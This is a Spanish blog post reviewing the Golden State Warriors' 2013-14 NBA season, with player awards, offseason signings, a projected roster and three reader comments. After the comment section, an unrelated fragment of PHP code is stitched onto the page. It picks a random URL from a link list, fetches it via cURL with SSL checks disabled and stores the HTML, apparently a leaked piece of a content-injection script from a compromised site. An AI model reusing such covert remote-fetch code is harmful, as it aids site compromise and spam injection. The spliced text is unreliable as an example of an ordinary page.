Golden State Warriors: Bien

24 de July de 2014 por txusma

Como muchos analistas, a principio de temporada también nos planteábamos si los Warriors eran firmes candidatos al anillo. El fichaje de Iguodala ponía la guinda a uno de los mejores (sinó el mejor) quintetos de todo el Oeste y parecía ser la pieza que faltaba para completar un puzzle ganador. De todas maneras también avisamos que buena parte del éxito del equipo dependía de la salud de sus integrantes ya que la plantilla parecía algo corta a simple vista.

Al término de la temporada el sabor que nos queda es algo amargo y eso que han acabado la regular con nada menos que 51 victorias algo que no veían en la bahía desde los tiempos de Chris Mullin, Tim Hardaway y Latrell Sprewell, por allá 1993. Lo curioso es que en ambas ocasiones conseguir más del 60% de victorias solo acabó sirviendo para alcanzar el 6º puesto de la conferencia y ser eliminados en 1ª ronda de playoffs. Eso sí, los de Don Nelson fueron barridos por los Phoenix Suns mientras que los Warriors de esta temporada exigieron el máximo a Los Angeles Clippers a pesar de no mostrar su mejor versión.

Con los números en la mano, nadie puede suspender la temporada de los Warriors. De hecho, el despido fulgurante del entrenador Mark Jackson una vez eliminados en primera ronda respondió más a temas relacionados con su gestión del equipo de asistentes y con el ambiente de trabajo que rodeaba a la plantilla que a los resultados en sí a pesar de que la mayoría de los aficionados esperábamos algo más del equipo. De todas maneras, es muy posible que el supuesto mal ambiente haya acabado afectando en el día a día y que el equipo no haya estado lo bien trabajado que podría haberlo estado en otras circunstancias. El fichaje de Andre Iguodala ha salido rana tanto por el nivel que ha mostrado el ex de Sixers y Nuggets (simplemente correcto), como por la pérdida de confianza que el movimiento provocó en Harrison Barnes en quien tantas esperanzas habíamos puesto tras sus superlativos playoffs del año pasado. Andrew Bogut fue un bastión en su propia zona hasta que acabó lesionándose en el peor momento posible y a David Lee no se le ha visto tan implicado como en otras ocasiones aunque es justo reconocerle que a la chita callando ha acabado con 18 puntos y 9 rebotes de media. En el momento de la verdad, Stephen Curry y Klay Thompson no pudieron compensar el desequilibrio en el juego interior y la temporada acabó antes de lo que muchos vaticinaban. 

De todas maneras, todo apunta a que el grueso del equipo tendrá una segunda oportunidad esta vez a las órdenes de Steve Kerr. Tal vez el cambio de entrenador era lo que le faltaba de verdad a la plantilla. Veremos.

PREMIOS

MVP: Un año más Stephen Curry (24p – 4.3r – 8.5a – 1.6rb) ha sido la estrella indiscutible del equipo. Ha cuajado su mejor temporada como profesional, por fin ha jugado su primer All-Star y lo ha hecho directamente como titular (el primero de los Warriors desde Sprewell) gracias a los votos de los aficionados, ha acabado incluido en el 2º mejor quinteto de la temporada y nos ha dejado momentos para recordar. El único ‘pero’ que le pondría es que este año no ha dado las exhibiciones que nos dejó en los playoffs del año pasado aunque tampoco se puede pedir todo, ¿no?

Rookie: La presencia de los rookies (Nemanja Nedovic, Dewayne Dedmon y el ex-La Penya Ognjen Kuzmic) ha sido testimonial.

Sorpresa: Draymond Green (6’2p – 5’0r – 1’9a – 1’2rb) fue uno de los grandes beneficiados en la primera ronda de los playoffs por la lesión de Andrew Bogut. Ya durante la regular se había mostrado muy sólido y era una pieza importante en los esquemas de Mark Jackson pero en la postemporada explotó, sobretodo en los 2 últimos partidos de la serie en los que contagió a todos sus compañeros de su garra y entrega y a punto estuvo de llevarse la victoria.

Decepción: Por un lado Harrison Barnes (9’5p – 4r – 1’5a) del que esperábamos mucho más esta temporada ejerciendo de 6º hombre. Ha calcado sus números de su temporada rookie pero con peores porcentajes de tiro, algo ínitimamente relacionado con la confianza. Por otro, Steve Blake y Jordan Crawford, incorporados a mitad de temporada con la esperanza de que hicieran olvidar a Jarrett Jack. Ni fusionándose habrían aportado ni la mitad de lo que Jack significaba para los Warriors de las 2012-2013.

Esfuerzo en vano: A nivel de números nadie puede poner en duda a David Lee (18’2p – 9’3r) pero lo cierto es que no goza precisamente de una legión de fans. Un día se cansará definitivametne de partirse el cobre y conseguir tan poco “cariño” a cambio.

JUGANDO A GM

Los Warriors han estado muy activos este verano y lo siguen estando ya que a día de hoy Kevin Love continúa siendo jugador de los Wolves. Los de la bahía fueron los primeros en intentar hacerse con los servicios del All-Star pero la exigencia de Minnesota de que Klay Thompson entrara en la operación supuso un freno en las negociaciones. Parece ser que los Warriors ofrecían un pack formado principalmente por David Lee y Harrison Barnes, insuficiente para los Wolves.

De momento el que sí que ha llegado al equipo proveniente de los Nets es Shaun Livingston, jugador con la calidad y las características necesarias para ejercer  de tercer hombre en las posiciones de base y escolta. Muy buen fichaje. También ha vuelto Brandon Rush aunque su presencia será más testimonial. Steve Blake ya ha volado y Jordan Crawford y Jermaine O’Neal son agentes libres. El primero no continuará en la franquicia y “El otro” O’Neal está considerando seriamente la retirada aunque aún puede aportar algunos minutos de calidad a pesar de sus maltrechas rodillas. Una vez solucionado el problema del base suplente, la prioridad ha de ser la de buscar un pívot suplente capaz de jugar de titular en las numerosas ausencias de Andrew Bogut, una tarea que no ha sido capaz de asumir Marresse Speights. El problema es que estamos a 24 de Julio y la mayoría de hombres altos de calidad ya han firmado. Se han ido los Spencer Hawes, Josh McRoberts,  Channing Frye, etc. Ahora mismo el hombre que mejor puede cumplir ese papel y que continúa libre es Andray Blatche. Habrá que ofrecerle algo más de 2 millones, que es a lo que renunció en los Nets pero creo que se los puede ganar.

Con este incorporación y sin Kevin Love el equipo es muy parecido al del año pasado pero con mejores piezas en el banquillo, banquillo que, no olvidemos, estará dirigido por Steve Kerr.

PG: Stephen Curry, Shaun Livingstone, Nemanja Nedovic
SG: Klay Thompson, Brandon Rush
SF: Andrew Iguodala, Harrison Barnes
PF: David Lee, Draymond Green, Festus Ezeli
C: Andrew Bogut, Andray Blatche, Marresse Speights, Ogjen Kuzmic

Comenta

3 comentarios a esta entrada

  1. Guillermo dice:
    #1

    Completamente de acuerdo con todo el articulo.
    Quiero destacar sobre todo el tema David Lee.A mi me parece un jugador muy solido y como vosotros creo que no está siendo tratado justamente.Como siempre en el deporte quedan los últimos partidos y en este caso fue la seria contra los clippers en la que ante la ausencia de Bought se vio muy solo peleando contra dos animales como Jordan y Griffin.Yo es que el cambio por Love no lo veo claro.Lee para mi con sus normalmente buenos porcentajes y tiros en la pintura complemente muy bién el juego exterior de curry y thompson.Con Love cuantos triples se jugarían los warrios por partido? y aparte en defensa tampoco se mejora nada.
    Otro tema que también quería comentar es el de Green y Barnes.Esto leyendo a la gente decir fuera barnes,es muy frio y tal,nos quedamos con green ese si que vale.Como en el caso de Lee,se vive de los ultimos partidos en los que Green tuvo muchos minutos por la lesión de Bought.En mi opinión Barnes tiene un techo mucho,pero que mucho,mucho más alto que Daimond Green.Se ve que con confianza y minutos es un tio de diecimuchos puntos por partido con la gorra.Claro que para jugar 15,20 min con intensidad es verdad que Green te vale de sobra.
    Buenisima noticia para mi el fichaje de Livingston aunque con carecteristicas totalmente distintas por fin un digno sustituto de Jack.Y ya que estamos en el puesto de base esperemos que Kerr le de mas confianza a Nedovic que para mi es un buen jugador.
    Bueno ya acabo que para ser la primera vez que escribo aquí me he explayado bastante.
    Decir que llevo mas de 30 años viendo basquet y que pocos jugadores me han enganchado tanto como stephen curry hasta el punto que el año pasado por internet me tragé casi todos los partidos de los warriors.
    Felicidades por vuestro blog.Seguir asi

      Citar

  2. txusma dice:
    #2

    Esperemos que sea el primer comentario de muchos!

      Citar

  3. Lucho dice:
    #3

    Curry tiene una magia especial
    Comparto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>